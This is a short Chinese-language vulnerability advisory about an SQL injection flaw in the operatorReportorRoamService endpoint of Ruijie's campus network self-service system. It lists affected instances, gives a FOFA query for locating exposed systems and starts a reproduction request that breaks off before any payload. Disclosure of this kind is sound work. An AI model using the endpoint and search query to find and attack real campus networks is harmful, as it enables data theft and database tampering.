简介
锐捷校园网自助服务系统是锐捷网络推出的一款面向学校和校园网络管理的解决方案。该系统旨在提供便捷的网络自助服务,使学生、教职员工和网络管理员能够更好地管理和利用校园网络资源。
漏洞描述
锐捷校园网自助服务系统 operatorReportorRoamService 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
影响版本与影响数量
影响版本:锐捷校园网自助服务系统
影响数量:322
Fofa:
title=="校园网自助服务系统"
漏洞编号与披露时间
漏洞编号:暂无
披露时间:2024-05-01
漏洞复现
POST /selfservice/service/operatorReportorRoamService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; W